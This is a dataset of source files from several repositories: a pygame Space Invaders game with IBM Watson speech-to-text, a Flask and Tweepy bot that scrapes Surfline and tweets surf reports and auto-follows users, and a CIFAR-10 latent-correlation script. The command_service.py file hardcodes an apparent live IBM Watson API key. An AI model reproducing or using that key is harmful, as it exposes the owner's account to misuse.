index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
53,402 | akarishiraj/Voice-Controlled-Game-Space-Invader | refs/heads/master | /configuration.py | #congiguration
MUSIC_PATH = "music/"
IMG_PATH = "images/"
EXPLOSION_SOUND = MUSIC_PATH+"explosion.wav"
BULLET_SOUND = MUSIC_PATH+"laser.wav"
BACKGROUND_WAV = MUSIC_PATH+"background.wav"
FONT_PATH = 'freesansbold.ttf'
BULLET_PNG = IMG_PATH+"bullet.png"
ENEMY_PNG = IMG_PATH+'enemy.png'
ICON = IMG_PATH+"periscope.png"
BACKGROUND = IMG_PATH+"background.png"
PLAYER_PNG = IMG_PATH+"player.png"
PX = 370
PY = 480
CAPTION = "Space Invaders"
SCREEN_HEIGHT = 600
SCREEN_WIDTH = 800
| {"/keyboard_game.py": ["/configuration.py"]} |
53,403 | akarishiraj/Voice-Controlled-Game-Space-Invader | refs/heads/master | /command_service.py | from ibm_watson import SpeechToTextV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
def activate():
# initialize speech to text service
authenticator = IAMAuthenticator('yTSSJ5GSmGhgIA95KnVPDf61KSZinztq909UBMfoqh7l')
speech_to_text = SpeechToTextV1(authenticator=authenticator)
speech_to_text.set_service_url(
"https://api.us-east.speech-to-text.watson.cloud.ibm.com/instances/77c94867-643f-431b-a593-0bc775c18bb7")
return speech_to_text
def stop(stream, audio, audio_source):
try:
stream.stop_stream()
stream.close()
audio.terminate()
audio_source.completed_recording()
except Exception as e:
print("ERROR")
print(e)
| {"/keyboard_game.py": ["/configuration.py"]} |
53,404 | akarishiraj/Voice-Controlled-Game-Space-Invader | refs/heads/master | /keyboard_game.py | import pygame
import random
import math
from pygame import mixer
from configuration import *
from command import *
# initialize the pygame
pygame.init()
# create the screen
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT)) # width , height or x,y axis
# Background
background = pygame.image.load(BACKGROUND)
running = False
# title and icons
pygame.display.set_caption(CAPTION)
icon = pygame.image.load(ICON)
pygame.display.set_icon(icon)
# Player
playerImg = pygame.image.load(PLAYER_PNG)
playerX = PX
playerY = PY
playerX_change = 0
# enemy
# Enemy
enemyImg = []
enemyX = []
enemyY = []
enemyX_change = []
enemyY_change = []
num_of_enemies = 6
for i in range(num_of_enemies):
enemyImg.append(pygame.image.load(ENEMY_PNG))
enemyX.append(random.randint(0, 736))
enemyY.append(random.randint(50, 150))
enemyX_change.append(4)
enemyY_change.append(40)
# Bullet
bulletImg = pygame.image.load(BULLET_PNG)
bulletX = 0
bulletY = PY # coordinate of spaceship
bulletX_change = 0
bulletY_change = 10
# ready- you cant see bullet on screen
# fire- bullet is moving
bullet_state = "ready"
# Score
score_value = 0
font = pygame.font.Font(FONT_PATH, 32)
textX = 10
textY = 10
# Game Over
over_font = pygame.font.Font(FONT_PATH, 64)
def game_over_text():
over_text = over_font.render("GAME OVER", True, (255, 255, 255))
screen.blit(over_text, (200, 250))
def show_score(x, y):
score = font.render("Score : " + str(score_value), True, (255, 255, 255))
screen.blit(score, (x, y))
def player(x, y):
screen.blit(playerImg, (x, y))
def enemy(x, y, i):
screen.blit(enemyImg[i], (x, y)) # blit means draw
def fire_bullet(x, y):
global bullet_state
bullet_state = "fire"
screen.blit(bulletImg, (x + 16, y + 10)) # 16 is added so that bullet look at the center of spaceship
def isCollision(enemyX, enemyY, bulletX, bulletY):
distance = math.sqrt(math.pow(enemyX - bulletX, 2) + (math.pow(enemyY - bulletY, 2)))
if distance < 25:
return True
else:
return False
try:
# Background Sound
mixer.music.load(BACKGROUND_WAV)
mixer.music.play(-1)
# game loop
while running:
# RGB - red, green and blue
screen.fill((0, 0, 0))
# background image
screen.blit(background, (0, 0))
# playerX += 0.2 # to move right
# playerX -=0.1 # to move left
# playerY -= 0.1 # to move up
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
# if keystroke is pressed check whether right or left
if event.type == pygame.KEYDOWN: # KEYDOWN means any key is pressed
# print("KEY is pressed")
if event.key == pygame.K_LEFT:
playerX_change = -5
if event.key == pygame.K_RIGHT:
playerX_change = 5
if event.key == pygame.K_SPACE:
if bullet_state == "ready":
bullet_sound = mixer.Sound(BULLET_SOUND)
bullet_sound.play()
bulletX = playerX
fire_bullet(bulletX, bulletY)
if event.type == pygame.KEYUP: # when key is released
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
playerX_change = 0
playerX += playerX_change
# creating boundaries
if playerX <= 0:
playerX = 0
elif playerX >= 736: # 800-64 the size of spaceship
playerX = 736
for i in range(num_of_enemies):
if enemyY[i] > 440:
for j in range(num_of_enemies):
enemyY[j] = 2000
game_over_text()
break
enemyX[i] += enemyX_change[i]
# creating boundaries
if enemyX[i] <= 0:
enemyX_change[i] = 4
enemyY[i] += enemyY_change[i]
elif enemyX[i] >= 736:
enemyX_change[i] = -4
enemyY[i] += enemyY_change[i]
collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)
if collision:
collision_sound = mixer.Sound(EXPLOSION_SOUND)
collision_sound.play()
bulletY = PY
bullet_state = "ready"
score_value += 1
print(score_value)
enemyX[i] = random.randint(0, 735)
enemyY[i] = random.randint(50, 150)
enemy(enemyX[i], enemyY[i], i)
# bullet movement
if bulletY <= 0:
bulletY = PY
bullet_state = "ready"
if bullet_state is "fire":
fire_bullet(bulletX, bulletY)
bulletY -= bulletY_change
player(playerX, playerY) # remember to call player above screen.fill because player needs to be above on the
# screen otherwise it
# will not appear
show_score(textX, textY)
pygame.display.update()
except Exception as e:
print("game closed")
| {"/keyboard_game.py": ["/configuration.py"]} |
53,421 | colestriler/SurfRobot | refs/heads/master | /flaskapp/models.py | from datetime import datetime
from flaskapp import db
class Report(db.Model):
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime, nullable=False, default=datetime.now())
location = db.Column(db.String(), nullable=False)
condition = db.Column(db.String(), nullable=False)
wave_height = db.Column(db.String(), nullable=False)
tide = db.Column(db.String(), nullable=False)
wind = db.Column(db.String(), nullable=False)
swells = db.Column(db.String(), nullable=True)
weather = db.Column(db.String(), nullable=False)
h20_temp = db.Column(db.String(), nullable=False)
# first_light = db.Column(db.DateTime, nullable=True)
# last_light = db.Column(db.DateTime, nullable=True)
def __repr__(self):
return f"Report('{self.id}', '{self.date}', '{self.location}', '{self.condition}', '{self.wave_height}', '{self.tide}', '{self.wind}', '{self.swells}', '{self.weather}', '{self.h20_temp}')"
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,422 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/collect_data.py | import bs4
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import pandas as pd
import numpy as np
import re
import datetime
import requests
tmp_url = "https://www.surfline.com/surf-report/terra-mar-point/5842041f4e65fad6a77088a6"
tamarack = 'https://www.surfline.com/surf-report/tamarack/5842041f4e65fad6a7708837'
oside_pier_south_url = "https://www.surfline.com/surf-report/oceanside-pier-southside/584204204e65fad6a7709435"
oside_pier_north_url = "https://www.surfline.com/surf-report/oceanside-pier-northside/5842041f4e65fad6a7708835"
oside_harbor_north_url = "https://www.surfline.com/surf-report/oceanside-harbor-north-jetty/5842041f4e65fad6a7708832"
grandview_url = "https://www.surfline.com/surf-report/grandview/5842041f4e65fad6a770889f"
seaside_reef_url = "https://www.surfline.com/surf-report/seaside-reef/5842041f4e65fad6a77088b3"
d_street_url = "https://www.surfline.com/surf-report/d-street/5842041f4e65fad6a77088b7"
la_jolla_url = "https://www.surfline.com/surf-report/la-jolla-shores/5842041f4e65fad6a77088cc"
swamis_url = "https://www.surfline.com/surf-report/swami-s/5842041f4e65fad6a77088b4"
pacific_beach = 'https://www.surfline.com/surf-report/pacific-beach/5842041f4e65fad6a7708841'
beacons='https://www.surfline.com/surf-report/beacons/5842041f4e65fad6a77088a0'
moonlight='https://www.surfline.com/surf-report/moonlight-state-beach/5842041f4e65fad6a77088a3'
pipes = 'https://www.surfline.com/surf-report/pipes/5c008f5313603c0001df5318'
blacks='https://www.surfline.com/surf-report/blacks/5842041f4e65fad6a770883b'
windansea='https://www.surfline.com/surf-report/windansea/5842041f4e65fad6a770883c'
la_jolla_shores='https://www.surfline.com/surf-report/la-jolla-shores/5842041f4e65fad6a77088cc'
tourmaline='https://www.surfline.com/surf-report/old-man-s-at-tourmaline/5842041f4e65fad6a77088c4'
torrey_pines='https://www.surfline.com/surf-report/torrey-pines-state-beach/584204204e65fad6a7709994'
del_mar='https://www.surfline.com/surf-report/del-mar/5d7687fdb4c559000112e666'
san_elijo='https://www.surfline.com/surf-report/san-elijo-state-beach/5842041f4e65fad6a77088b8'
trails = "https://www.surfline.com/surf-report/trails/5842041f4e65fad6a7708885"
the_point = "https://www.surfline.com/surf-report/the-point-at-san-onofre/5842041f4e65fad6a7708831"
upper_trestles = "https://www.surfline.com/surf-report/upper-trestles/5842041f4e65fad6a7708887"
lower_trestles = "https://www.surfline.com/surf-report/lower-trestles/5842041f4e65fad6a770888a"
san_onofre = "https://www.surfline.com/surf-report/san-onofre-state-beach/584204204e65fad6a77099d4"
urls = [
beacons,
blacks,
d_street_url,
del_mar,
grandview_url,
la_jolla_url,
moonlight,
oside_harbor_north_url,
oside_pier_north_url,
oside_pier_south_url,
pacific_beach,
pipes,
san_elijo,
san_onofre,
seaside_reef_url,
swamis_url,
tamarack,
the_point,
tmp_url,
torrey_pines,
tourmaline,
trails,
upper_trestles,
lower_trestles,
windansea
]
def get_surf_data():
dictionary = {}
for url in urls:
data = {}
url_page = requests.get(url)
url_soup = soup(url_page.text, "html.parser")
url_loc = url_soup.h1.text.replace(" Report & Forecast", "")
# current conditions (i.e. top table on website)
current_cond = url_soup.find("div", {"class": "quiver-spot-report"})
url_cond = current_cond.div.text.lower()
data['condition'] = url_cond
# takes current wave height
current_height = url_soup.find("span", {"class": "quiver-surf-height"})
url_height = current_height.text.lower()
data['wave_height'] = url_height
# takes current tide
current_tide = url_soup.find("div", {
"class": "quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--tide"})
url_tide = current_tide.next_element.next_element.next_element.text
data['tide'] = url_tide
# takes wind speed
current_wind = url_soup.find("div", {
"class": "quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--wind"})
url_wind = current_wind.next_element.next_element.next_element.text
data['wind'] = url_wind
# # swells
# data['swells'] = [swells_line_1, swells_line_2, swells_line_3]
# outside temp
current_weather = url_soup.find("div", {"class": "quiver-weather-stats"})
url_weather = current_weather.next_element.next_element.next_element.next_element.next_element
data['weather'] = url_weather
# water temp
current_H20temp = url_soup.find("div", {"class": "quiver-water-temp"})
H20temp1 = current_H20temp.next_element.next_element.next_element.next_element.next_element
H20temp2 = current_H20temp.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element.next_element
data['H20temp'] = H20temp1 + "-" + H20temp2
# ----------------- API --------------------
# WEATHER DATA
spot_id = url.split('/')[-1]
api_url = 'https://services.surfline.com/kbyg/spots/forecasts/weather?spotId={}&days=6&intervalHours=1'.format(spot_id)
api_data = requests.get(api_url).json()
# first light
first_light_timestamp = api_data['data']['sunlightTimes'][0]['dawn']
first_light = datetime.datetime.fromtimestamp(first_light_timestamp)
data['first_light'] = first_light
# last light
last_light_timestamp = api_data['data']['sunlightTimes'][0]['dusk']
last_light = datetime.datetime.fromtimestamp(last_light_timestamp)
data['last_light'] = last_light
dictionary[url_loc] = data
return dictionary
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,423 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/follow_users.py | import tweepy
from flaskapp.bots.config_class import API
api_class = API()
api = api_class.create_api()
pro_surfers = ['bethanyhamilton', 'kellyslater',
'jordysmith88', #san clemente
"surfer", "Kai_Lenny", "CaioIbelli", 'nikkivandijk_', '_VicVergara',
'KSWaveCo', 'cbasszietz']
def follow():
# num_followed = 0
# while num_followed <= 15:
# for follower in api.followers('bethanyhamilton', count=5):
# if follower.location == "Carlsbad, CA":
# api.create_friendship(id = follower.id)
# num_followed+=1
num_followed = 0
for tweet in tweepy.Cursor(api.search, q="#surfing").items():
if num_followed < 30:
api.create_friendship(tweet.author.screen_name)
num_followed += 1
# print(tweet.author.screen_name)
# limit = api.rate_limit_status()
# limit['resources']['followers']['/followers/ids']['remaining']
#
# limit['resources']['followers']['/followers/list']['remaining']
#
# limit['resources']['friendships']
# api.show_friendship(source_id=surfrobot.id, target_id=cole.id)
# (Friendship(_api=<tweepy.api.API object at 0x10cfd0358>, _json={
# 'id': 1184003500247642114,
# 'id_str': '1184003500247642114',
# 'screen_name': 'SurfRobot',
# 'following': True,
# 'followed_by': True,
# 'live_following': False,
# 'following_received': None,
# 'following_requested': None,
# 'notifications_enabled': None,
# 'can_dm': True, 'blocking': None,
# 'blocked_by': None,
# 'muting': None,
# 'want_retweets': None,
# 'all_replies': None,
# 'marked_spam': None},
# id=1184003500247642114, id_str='1184003500247642114', screen_name='SurfRobot', following=True, followed_by=True, live_following=False, following_received=None, following_requested=None, notifications_enabled=None, can_dm=True, blocking=None, blocked_by=None, muting=None, want_retweets=None, all_replies=None, marked_spam=None), Friendship(_api=<tweepy.api.API object at 0x10cfd0358>, _json={'id': 2594449783, 'id_str': '2594449783', 'screen_name': 'ColeStriler', 'following': True, 'followed_by': True, 'following_received': None, 'following_requested': None}, id=2594449783, id_str='2594449783', screen_name='ColeStriler', following=True, followed_by=True, following_received=None, following_requested=None))
# surfrobot = api.get_user('surfrobot')
# cole = api.get_user('cole')
# friendship = api.show_friendship(source_id=surfrobot.id, target_id=cole.id)
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,424 | colestriler/SurfRobot | refs/heads/master | /clock.py | import os
from apscheduler.schedulers.blocking import BlockingScheduler
from flaskapp.bots.create_tweet import tweet
from flaskapp.bots.follow_users import follow
import datetime
sched = BlockingScheduler()
# @sched.scheduled_job('interval', minutes=.5)
# def timed_job():
# print('This job is run every three minutes.')
# api.update_status("hello")
# -------------------------------------------------------------------------
if os.getenv("DEVELOPMENT") == "True":
# # RUN IN DEVELOPMENT
print("BEFORE TWEET")
time = datetime.datetime.now()
@sched.scheduled_job('cron', day_of_week='*',
hour=time.hour,
minute=time.minute,
second=time.second + 12
)
def test():
print("STARTING TWEET")
tweet()
print("TWEETED")
# --------------------------------------------------------------------------
# RUN IN DEVELOPMENT
# print("BEFORE FOLLOWING")
#
# time = datetime.datetime.now()
# @sched.scheduled_job('cron', day_of_week='*',
# hour=time.hour,
# minute=time.minute,
# second=time.second + 12
# )
# def test():
# print("START FOLLOWING")
# follow()
# print("FOLLOWED")
#-------------------------------------------------------------------------------
else:
# RUN IN PRODUCTION
@sched.scheduled_job('cron', day_of_week='*', hour=10, minute=30)
def morning():
tweet()
follow()
@sched.scheduled_job('cron', day_of_week='*', hour=16)
def afternoon():
tweet()
sched.start()
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,425 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/create_tweet.py | import os
from datetime import datetime
import calendar
from flaskapp.bots.collect_data import get_surf_data
import time
import secrets
from flaskapp import create_app, db
from flaskapp.models import Report
from flaskapp.bots.config_class import API
import tweepy
api_class = API()
api = api_class.create_api()
surf_data = get_surf_data()
locations = []
datas = []
for location, data in surf_data.items() :
locations.append(location)
datas.append(data)
length_locations = len(locations)
def tweet():
# DELETE ALL PREVIOUS TWEETS IF USING TESTING ACOUNT
# if api_class.delete_all:
# for status in tweepy.Cursor(api.user_timeline).items():
# api.destroy_status(status.id)
today = datetime.today()
dow = calendar.day_name[today.weekday()]
now = datetime.now()
current_time = now.strftime("%H:%M")
reports = []
if today.hour <= 12:
time = "Morning"
else:
time = "Afternoon"
first_tweet = f"""🏄🏽♂️ {time} surf report for {dow} at {current_time}:
"""
api.update_status(first_tweet)
for i in range(length_locations):
previous_tweet = api.user_timeline(id = api.me().id, count = 1)[0]
if datas[i]['condition'] == "poor":
cond_emoji = "❌"
elif datas[i]['condition'] == "poor to fair":
cond_emoji = "⚠️"
else:
cond_emoji = "✅"
tweet = f"""{locations[i]} ({time}):
{cond_emoji}Condition: {datas[i]['condition']}
{"🌊"}Wave height: {datas[i]['wave_height']}
{"🌙"}Tide: {datas[i]['tide']}
{"💨"}Wind: {datas[i]['wind']}
{"🌡"}Water temp: {datas[i]['H20temp']}℉
{"🌞"}Outside Weather: {datas[i]['weather']}℉
{"🌅"}First Light: {datas[i]['first_light'].strftime("%H:%M")}
{"🌌"}Last Light: {datas[i]['last_light'].strftime("%H:%M")}
"""
# {"🧭"}
# Swells: {datas[i]['swells'][0]},
# {datas[i]['swells'][1]}
api.update_status(tweet, in_reply_to_status_id = previous_tweet.id)
report = Report(
date=now,
location=locations[i],
condition=datas[i]['condition'],
wave_height=datas[i]['wave_height'],
tide=datas[i]['tide'],
wind=datas[i]['wind'],
# swells = db.Column(db.String(), nullable=True),
weather=datas[i]['weather'],
h20_temp=datas[i]['H20temp']
)
reports.append(report)
# Adding To Database
app = create_app()
with app.app_context():
# ctx.push()
for report in reports:
db.session.add(report)
db.session.commit()
# ctx.pop()
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,426 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/waves.py | import bs4
from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
import pandas as pd
import numpy as np
import re
import requests
""" I made this project to learn web scraping. This is my first project using BeautifulSoup and I plan on optimizing
my code as I continue to learn the software."""
tmp_url = "https://www.surfline.com/surf-report/terra-mar-point/5842041f4e65fad6a77088a6"
oside_pier_south_url = "https://www.surfline.com/surf-report/oceanside-pier-southside/584204204e65fad6a7709435"
oside_pier_north_url = "https://www.surfline.com/surf-report/oceanside-pier-northside/5842041f4e65fad6a7708835"
oside_harbor_url = "https://www.surfline.com/surf-report/oceanside-harbor-north-jetty/5842041f4e65fad6a7708832"
grandview_url = "https://www.surfline.com/surf-report/grandview/5842041f4e65fad6a770889f"
seaside_reef_url = "https://www.surfline.com/surf-report/seaside-reef/5842041f4e65fad6a77088b3"
d_street_url = "https://www.surfline.com/surf-report/d-street/5842041f4e65fad6a77088b7"
la_jolla_url = "https://www.surfline.com/surf-report/la-jolla-shores/5842041f4e65fad6a77088cc"
swamis_url = "https://www.surfline.com/surf-report/swami-s/5842041f4e65fad6a77088b4"
urls = [tmp_url, oside_harbor_url, oside_pier_north_url, oside_pier_south_url, swamis_url, grandview_url, d_street_url]
class Report:
def __init__(self):
self.waves = pd.DataFrame()
def report_surf(self):
# making rows for dataframe
location = np.array([])
condition = np.array([])
height = np.array([])
water_temp = np.array([])
weather = np.array([])
tide = np.array([])
wind = np.array([])
for url in urls:
# Opening up connection, grabbing the page
url_page = requests.get(url)
# html parser
url_soup = soup(url_page.text, "html.parser")
# 'Terra Mar Point Surf'
url_loc = url_soup.h1.text.replace(" Report & Forecast", "")
# current conditions (i.e. top table on website)
current_cond = url_soup.find("div", {"class": "sl-spot-report"})
url_cond = current_cond.div.text.lower()
# len(url_data) == 4
url_data = url_soup.findAll("div", {"class": "sl-spot-forecast-summary__stat"})
# takes current wave height
pattern = '[0-9]+-[0-9]+FT'
url_height = re.findall(pattern, url_data[0].text)[0].replace("FT", " FT")
# takes current tide
pattern = "[0-9].[0-9]+FT"
url_tide = re.findall(pattern, url_data[1].text)[0].replace("FT", " FT")
# takes wind speed
pattern = '[0-9]+[A-Z]+'
url_wind = re.findall(pattern, url_data[2].text)[0].replace("KTS", " ")
# outside temp
pattern = '[0-9]+ ºF'
url_weather = url_soup.find("div", {"class": "sl-wetsuit-recommender__conditions__weather"}).text
url_weather = re.findall(pattern, url_weather)[0]
# use for water temp
wetsuit = url_soup.find("div", {"class": "sl-wetsuit-recommender__conditions"})
# water temp
pattern = '[0-9]+ - [0-9]+ ºF'
H20temp = re.findall(pattern, wetsuit.div.text)[0]
# columns for DataFrame
columns = np.array(["location", "condition", "wave height", "H20temp", "weather", "tide", "wind"])
# making rows for DataFrame
location = np.append(location, url_loc)
condition = np.append(condition, url_cond)
height = np.append(height, url_height)
water_temp = np.append(water_temp, H20temp)
weather = np.append(weather, url_weather)
# sunrise = np.array([1])
# sunset = np.array([1])
tide = np.append(tide, url_tide)
wind = np.append(wind, url_wind)
# making dataframe
report = pd.DataFrame(columns=columns)
report['location'] = location
report['condition'] = condition
report['wave height'] = height
report['H20temp'] = water_temp
report['weather'] = weather
# report['sunrise'] = sunrise
# report['sunset'] = sunset
report['tide'] = tide
report['wind'] = wind
self.waves = report
# return the DataFrame
return report
def best(self):
if self.waves.size == 0:
return "Need to run .report_surf() first."
if len(self.waves[self.waves['condition'] == 'fair']) > 0:
# converts wind collumn to integers
pattern = "[0-9]"
self.waves['wind'] = np.array([int(re.findall(pattern, i)[0]) for i in self.waves['wind']])
# best location has lowest wind
best_location = self.waves.sort_values('wind', ascending=True).iloc[0, 0]
return f"The best location is {best_location}."
else:
return "There is no good surf today."
print("'r.waves' will display the wave report")
print("'r.best() will show the best surf location (if any).")
print("loading...")
r = Report()
r.report_surf()
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,427 | colestriler/SurfRobot | refs/heads/master | /flaskapp/__init__.py | from flask import Flask
from flaskapp.config import Config
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_bcrypt import Bcrypt
# from flask_login import LoginManager
from flask_mail import Mail
# run python run.py
# CREATE EXTENSIONS OUTSIDE OF FUNCTION BUT INITIALIZE INSIDE FUNCTION WITH THE APPLICATION
db = SQLAlchemy() #represent database structure as classes -> called MODELS
bcrypt = Bcrypt()
# login_manager = LoginManager()
# login_manager.login_view = 'users.login' # telling extension where the login route is located, login is fn name for route
# login_manager.login_message_category = 'info' # blue info alert in bootstrap
mail = Mail() #initializes extension
def create_app(config_class=Config):
app = Flask(__name__) # special variable in python that's the name of the module
app.config.from_object(Config)
db.init_app(app)
bcrypt.init_app(app)
# login_manager.init_app(app)
mail.init_app(app)
# REGISTER BLUEPRINTS
from flaskapp.bots.app import bots
app.register_blueprint(bots)
return app
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,428 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/app.py | from flask import render_template, request, Blueprint, flash, redirect, url_for
bots = Blueprint('bots', __name__)
@bots.route('/', methods=['GET', 'POST'])
#@main.route('/home', methods=['GET', 'POST'])
def home():
return render_template('home.html')
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,429 | colestriler/SurfRobot | refs/heads/master | /flaskapp/bots/config_class.py | import tweepy
import logging
import os
logger = logging.getLogger()
class API():
def __init__(self):
if os.getenv("DEVELOPMENT") == "True":
self.consumer_key = os.getenv("TESTING_CONSUMER_KEY")
self.consumer_secret = os.getenv("TESTING_CONSUMER_SECRET")
self.access_token = os.getenv("TESTING_ACCESS_TOKEN")
self.access_token_secret = os.getenv("TESTING_ACCESS_TOKEN_SECRET")
self.delete_all = True
self.unfollow_all = True
else:
self.consumer_key = os.getenv("SURFROBOT_CONSUMER_KEY")
self.consumer_secret = os.getenv("SURFROBOT_CONSUMER_SECRET")
self.access_token = os.getenv("SURFROBOT_ACCESS_TOKEN")
self.access_token_secret = os.getenv("SURFROBOT_ACCESS_TOKEN_SECRET")
self.delete_all = False
self.unfollow_all = False
def create_api(self):
auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)
auth.set_access_token(self.access_token, self.access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
try:
api.verify_credentials()
except Exception as e:
logger.error("Error creating API", exc_info=True)
raise e
logger.info("API created")
return api
| {"/flaskapp/models.py": ["/flaskapp/__init__.py"], "/flaskapp/bots/follow_users.py": ["/flaskapp/bots/config_class.py"], "/clock.py": ["/flaskapp/bots/create_tweet.py", "/flaskapp/bots/follow_users.py"], "/flaskapp/bots/create_tweet.py": ["/flaskapp/bots/collect_data.py", "/flaskapp/__init__.py", "/flaskapp/models.py", "/flaskapp/bots/config_class.py"], "/flaskapp/__init__.py": ["/flaskapp/bots/app.py"]} |
53,466 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_correlation_map.py |
import seaborn
from keras.datasets import cifar10
import numpy as np
import keras.utils
import matplotlib.pyplot as plt
from cifar10_models import deterministic_encoder_model
# Define constants
num_classes = 10
latent_dim = 64
# Load saved models for encoder and decoder
encoder = deterministic_encoder_model()
encoder.load_weights('cifar10_bigan_determ_encoder.h5')
# Load MNIST data and split into train and test set
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
X_train = X_train.astype(np.float32) / 255.
X_test = X_test.astype(np.float32) / 255.
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
y_train = y_train.reshape((y_train.shape[0]))
# Encoder training set
latent_spaces = encoder.predict(X_train)
# Get max and min value of entire set for later plotting purposes
max = np.max(latent_spaces)
min = np.min(latent_spaces)
# Split training set into classes
latent_plane = latent_spaces[y_train == 0]
latent_automobile = latent_spaces[y_train == 1]
latent_bird = latent_spaces[y_train == 2]
latent_cat = latent_spaces[y_train == 3]
latent_deer = latent_spaces[y_train == 4]
latent_dog = latent_spaces[y_train == 5]
latent_frog = latent_spaces[y_train == 6]
latent_horse = latent_spaces[y_train == 7]
latent_ship = latent_spaces[y_train == 8]
latent_truck = latent_spaces[y_train == 9]
# Create list of all latent arrays
latent_sets = (latent_plane, latent_automobile, latent_bird, latent_cat, latent_deer, latent_dog, latent_frog,
latent_horse, latent_ship, latent_truck)
# Get correlation coefficients of all latent dimensions for entire training set
one_latent_dim_interclass_correlations = np.corrcoef([set[:,0] for set in latent_sets])
training_set_latent_correlations = np.corrcoef([latent_spaces[:,i] for i in range(latent_dim)])
# Remove duplicate correlation from array, through use of mask
mask = np.zeros_like(one_latent_dim_interclass_correlations)
mask[np.triu_indices_from(mask)] = True
mask[np.diag_indices_from(mask)] = False
values = np.arange(0.5, num_classes+0.5, 1)
names = ['Plane','AM','Bird','Cat','Deer','Dog','Frog','Horse','Ship','Truck']
for i in range(latent_dim):
plt.figure()
one_latent_dim_interclass_correlations = np.corrcoef([set[:,i] for set in latent_sets])
seaborn.heatmap(one_latent_dim_interclass_correlations, cmap='RdYlGn_r', vmax=1.0, vmin=-1.0, mask=mask, linewidths=2.5)
plt.yticks(values, names, rotation=0)
plt.xticks(values, names, rotation=90)
plt.savefig('Images/cifar10_interclass_corr_latent_%d' % i)
plt.close()
# Remove duplicate correlation from array, through use of mask
mask = np.zeros_like(training_set_latent_correlations)
